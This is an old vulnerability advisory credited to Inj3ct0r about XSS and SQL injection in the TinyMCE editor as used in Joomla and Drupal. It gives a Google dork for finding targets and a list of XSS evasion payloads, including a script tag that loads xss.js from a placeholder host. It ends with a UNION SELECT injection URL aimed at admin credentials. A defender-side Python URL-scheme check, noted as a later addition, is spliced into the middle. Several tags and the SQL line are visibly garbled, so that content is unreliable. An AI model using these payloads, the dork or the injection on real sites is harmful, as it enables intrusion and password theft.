SECURITYVULNS:DOC:23189
Feb 08, 2010 - 12:00 a.m.

TinyMCE - Javascript WYSIWYG Editor XSS/SQL injection vulnerability

2010-02-08 00:00:00
vulners.com

===================================================================
TinyMCE - Javascript WYSIWYG Editor XSS/SQL injection vulnerability

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
  Inj3ct0r  >> Exploit database separated by exploit type (local, remote, DoS, etc.)
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

#[+] Discovered By : Inj3ct0r
#[+] Site : Inj3ct0r.com
#[+] support e-mail : submit[at]inj3ct0r.com

[+] Vulnerability : JS tiny_mce/tiny_mce WYSIWYG (JavaScript) vulnerability, XSS -> popup
                    & SQL injection in the applications it is implemented in
[+] Language      : JavaScript, XML
[+] License       : LGPL
[+] Vendor        : Moxiecode Systems AB
[+] Support       : IE7.0/IE6.0/NS8.1-IE/NS8.1-G/FF2.0/O9.02
[+] Vendor site   : http://tinymce.moxiecode.com/
[+] Implemented in: Joomla component, Drupal, ...
[+] dork : powered:powered by CMS
: inurl"file_manager.php?type=img"

--[Vulnerability sampling]--


alert(String.fromCharCode(X1,X2,X3,X4))//";alert(String.fromCharCode(X1,X2,X3,x4))//\";

    alert(String.fromCharCode(X1,X2,X3,x4))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(X1,X2,X3,x4))</SCRIPT>


'';!--"<XSS>=&{()}'


    <script SRC=http//:server.com/xss.js></put_SCRIPT>
    <a hreef="http://www.server://www.server.com/server.com/">put_code</a>
    <a href="http://www.server.com./">put_code</a>
    <marquee>http://server.net">put_code</marquee>
    <a href="//srver.net">put_code</A>
    <a href="http://0x1x.01x0061.0x6/">put_code</a>

    [Thread img src]

    "<img src=javascript:alert(&quot;XSS&quot;)>"
    "<img src="javascript:alert('Put_script');"> [or] <IMG SRC=javascript:alert('put_Script')>"
    "<IMG SRC=javascript:alert(String.fromCharCode(X1,X2,X3,X4))>"
    "<img src=`javascript:alert("put_xss")`>"
    "<IMG SRC="jav  ascript:alert('XSS');">"

    <IMG
    SRC
    =
    "
    (write the javascript in vertical position, example:)
    j
    s
    :
    a
    l
    e
    r
    t
    (
    '
    put code in vertical position
    '
    )
    )
    ;
    >

    "<IMG SRC=&#1;&#2;&#3;&#4;&#5;&#6;&#7;>"

try conversion ----> use RainbowText on <IMG SRC=&#1;&#2;&#3;&#3>
compiling it puts every character in its own <font color="..."> tag, which renders as the same tag:
    <IMG SRC=&#1;&#2;&#3;&#3>
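A defender-side check, added here as an example and not part of the advisory or of TinyMCE's own code: it normalizes an href/src attribute value the way a browser would (entity decoding, control characters and whitespace removed from the scheme, surrounding quotes or backticks dropped) and then allowlists the scheme, so the tab, vertical-layout, entity and backtick variants listed above are all caught by one rule. The sample values are constructed after those vectors.

```python
import html
import re

# Allowlist of URL schemes permitted in href/src values; anything else is rejected.
SAFE_SCHEMES = {"http", "https", "mailto"}

# C0 controls, space and DEL: browsers drop or tolerate these inside a URL scheme; the
# vectors above hide "javascript:" this way (tab as &#x09;, spaces, one char per line).
_SCHEME_NOISE = re.compile(r"[\x00-\x20\x7f]")

# RFC 3986 scheme syntax: ALPHA *( ALPHA / DIGIT / "+" / "-" / "." )
_SCHEME_RE = re.compile(r"[A-Za-z][A-Za-z0-9+.-]*")

def normalize_attr(raw: str) -> str:
    """See the value as the browser does: decode entities (&#40; &#39; &#96; ...) and
    drop the quotes or backticks the vectors wrap around the value."""
    return html.unescape(raw).strip().strip("\"'`")

def url_scheme(value: str):
    """Lowercase scheme of a URL, or None when it has none (relative URL)."""
    collapsed = _SCHEME_NOISE.sub("", value)
    head, sep, _ = collapsed.partition(":")
    if not sep or not _SCHEME_RE.fullmatch(head):
        return None  # no colon, or junk before it: browsers treat that as a relative path
    return head.lower()

def is_safe_url(raw_attr: str) -> bool:
    """True only for scheme-less or allowlisted URLs (checks the scheme, not the host)."""
    scheme = url_scheme(normalize_attr(raw_attr))
    return scheme is None or scheme in SAFE_SCHEMES

# Constructed attribute values modelled on the vectors listed above (hypothetical input).
CONSTRUCTED_SAMPLES = {
    "javascript:alert('XSS')": False,
    "JaVaScRiPt:alert('XSS')": False,                    # case games
    "jav&#x09;ascript:alert&#40;'XSS'&#41;": False,      # tab hidden as an entity
    "jav  ascript:alert('XSS')": False,                  # embedded spaces
    "j\na\nv\na\ns\nc\nr\ni\np\nt\n:alert('x')": False,  # vertical layout
    "`javascript:alert(\"put_xss\")`": False,            # backtick-quoted value
    "http://www.server.com./": True,
    "//srver.net": True,                                 # protocol-relative link, no script
}

def triage() -> dict:
    """Run every constructed sample through the check; returns {sample: is_safe}."""
    return {sample: is_safe_url(sample) for sample in CONSTRUCTED_SAMPLES}

if __name__ == "__main__":
    for sample, verdict in triage().items():
        print("ALLOW " if verdict else "REJECT", repr(sample))
```

The scheme allowlist only decides whether script can run from the attribute; the obfuscated-host links above (http://0x1x.01x0061.0x6/) still pass it and need a separate host check if that matters to you.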

SQL injection (implemented): injection vulnerability ----> installed on c-panel (Joomla sample: write table view/editor)

Exploit :server/patch/index.php?menuID=-value union
select////users/2,3,4,5/password////from/2,3,4,5//,Group_CONCAT(name,CHAR(3,4,5),wachtwoord),2,3 from admin–

~ - [ [ : Inj3ct0r : ] ]